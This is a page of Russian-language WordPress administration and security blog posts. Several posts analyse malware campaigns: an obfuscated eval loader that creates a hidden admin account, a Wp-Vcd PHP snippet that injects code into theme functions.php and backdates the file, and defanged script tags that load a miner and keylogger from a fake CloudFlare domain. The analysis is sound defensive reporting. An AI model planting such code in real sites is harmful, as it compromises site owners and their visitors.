БЛОГ


Давно не писал, лето, знаете ли

По сообщению компаний, работающих в сфере IT безопасности, с начал сентября зафиксирована необычная технология кражи паролей Wordpress при помощи рассылки фишинговых писем.

Поддельное письмо выглядит как стандартное сообщение рассылки wordpress.org администраторам сайтов о необходимости обновления, стоит заметить, что  используемое оформление  соответствует устаревшим версиям CMS.

Опубликовано в БЛОГ

С мая этого года в Европе вводятся новые правила обработки персональных данных.

О самих правилах распространяться не имеет смысла, о них и так много было сказано.

Остановимся на основных требованиях для вебмастера:

Любой зарегистрировшийся посетитель должен иметь возможность удалить свой аккаунт вместе со всеми данными.

Нельзя собирать данные сверх того, что нужно. Поясню: если у вас интернет-магазин, не стоит требовать данные, сверх тех, которые нужны для доставки товара. Как, например, возраст, пол и так далее.

Посетитель должен иметь возможность исправить свои регистрационные данные.

На мой взгляд, наиболее оптимальным решением будет сделать вход через Open ID, в  этом случае вы также снимаете с себя ответственность за хранение данных, что тоже особо обговаривается в новом регламенте.  

Полный текст можно прочитать тут.

Опубликовано в БЛОГ

В этом месяце специалистами компании Sucuri необычный способ распространения зловредного кода через JavaScript из браузера посетителя. Хотя используется давно известная уязвимость не обновлённой темы News Magazine Newspaper , но метод заслуживает описания.

На уязвимые сайты загружается вредоносный код:

eval (String.fromCharCode (118, 97, 114, 32, 115, 115, 99 ...

После того, как посетитель заходит на зараженный сайт, Javascript проверяет, зарегистрирован ли посетитель в качестве администратора, обратившись к файлу /wp-admin/user-new.php в теневом режиме. Если пользователь является администратором, он создает пользователя с именем simple001 и с электронной почтой simple @ simplesite .com  с правами администратора.

Если посетитель не зарегистрирован как admin, javascript проверяет, является ли это первым посещением за последние десять часов (проверяя файл cookie checkmeonce), а затем перенаправляет на адрес hxxps: //for.stringengines [.] Com /sp.php?at=57&bc=345&rps=5467854&sty=457&get=75 .

Этот URL-адрес промежуточный в  цепочке перенаправления на фишинговые и сайты рекламного содержания. Перенаправления, как правило, на один и тот же сайт делается один раз, чаще всего на домены в зоне  .tk обозначенными как  «техническая поддержка» и случайными символами в имени домена, такими как 3cal1ingc0nstant31112123 [.] Tk или techsupport60512123456 [.] Tk .

Опубликовано в БЛОГ

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

Опубликовано в БЛОГ

К вредоносному скрипту криптомайнинга cloudflare.solutions, который несколько недель назад был обнаружен специалистами Sucuri, добавлена новая функция кейлогера.

Вводная часть этой вредоносной программы вообще не изменилась, и использует function.php , чтобы вызвать следующие сценарии на страницах WordPress:

 

<script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'> </ script>

 <script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/cors/cors.js'> </ script>

 

URL-адреса сценариев также совпадают, однако они используют поддельный домен CloudFlare. Первая  (reconnecting-websocket.js) по-прежнему загружает копию законной библиотеки ReconnectingWebSocket .

Основное изменение - скрипт cors.js. Теперь, после его декодирования там нет абсолютно подозрительного кода. Также скрипт загружает Яндекс Метрику, скорее всего, это делается для отслеживания зараженных сайтов. Кстати, идентификатор  этого Яндекс скрипта - 43930119 - его можно найти в HTML-коде главной страницы.

Опубликовано в БЛОГ

Многие владельцы сайтов на WordPress после добавления ресурса на Яндекс.Вебмастер встречают сообщение — "Отсутствуют мета-теги <description>". Что не очень хорошо сказывается на индексации. Разработчики знают об этой проблеме, но ничего предпринимают, ссылаясь на то, что мета-теги устарели, но нам в любом случае приходится придерживаться рекомендаций поисковых систем.

ошибка в Яндекс Вебмастер
Существует несколько способов решения этого требования

Первый, — правка исходного кода CMS, но на это у многих не хватает опыта, и к тому же после обновления системы измененные файлы могут быть заменены на оригинальные.

Второй, — установка плагина. Конечно, установка дополнительных плагинов замедляет работу системы, в плагинах находят уязвимости, возрастает нагрузка на сервер и так далее, но это самый простой путь.

Опубликовано в БЛОГ

Сколько копий сломано на просторах сети в спорах о преимуществах этих CMS. К слову, споры идут с самого основания этих платформ, и только несколько раз мне встретились серьезные исследования, где автор провел множество тестов и доказывал свою позицию с цифрами в руках.

Данный материал не несет цели начать новые «холивары», а просто показать разницу этих систем. Никому же приходит в голову сравнивать, что лучше, зимняя обувь или летние шлепанцы. И даже если задать такой вопрос, - что лучше? То, как правило, последует уточнение – зимой или летом?

Точно так же и с этими CMS, при выборе нужно исходить из задачи, а не мыслить критериями нравиться-не нравится. Никому же не приходит в голову ходить летом на пляже в зимних кроссовках.

Опубликовано в БЛОГ

Не так давно была заявка по чрезмерной нагрузке на хостинг, все в общем банально, но может кому пригодится.

После получения паролей я первым делом зашел в админ панель сайта и открыл менеджер перенаправлений (Joomla) где сразу увидел бота. Бот сканировал разные ссылки в поисках уязвимости, причем даже не относящихся к данной CMS.

Опубликовано в БЛОГ

Конечно, уже набило оскомину, но повторюсь – обновляйте свой Wordpress.

Причин использования необновленных движков множество, основная из них – администратор просто не знает о найденных уязвимостях. Обычно это случается с сайтами, которые редко обновляются, а администратор, не зайдя в админ панель, не видит сообщений о вышедшем обновлении, а иногда администраторы не заходят в панель управления по нескольку месяцев, а то и по году.

Причин использования необновленных движков множество, основная из них – администратор просто не знает о найденных уязвимостях. Обычно это случается с сайтами, которые редко обновляются, а администратор, не зайдя в админ панель, не видит сообщений о вышедшем обновлении, а иногда администраторы не заходят в панель управления по нескольку месяцев, а то и по году.

Для того, чтобы быть в курсе, подпишитесь на рассылку securityfocus.com или securitylab.ru.

Опубликовано в БЛОГ

За последние месяц-полтора было несколько обращений по чрезмерной нагрузке на хостинг, причем практически все от владельцев сайтов, работающих на Wordpress. Причина у всех оказалась одна и та же.

Если у Вас подобная ситуация, этот материал должен помочь (надеюсь).

Прежде всего, включаем в панели управления хостингом запись логов ошибок и доступа. Через несколько часов, после того, как логи накопятся, открываем их в любом текстовом редакторе, например Notepad

Опубликовано в БЛОГ
Страница 1 из 2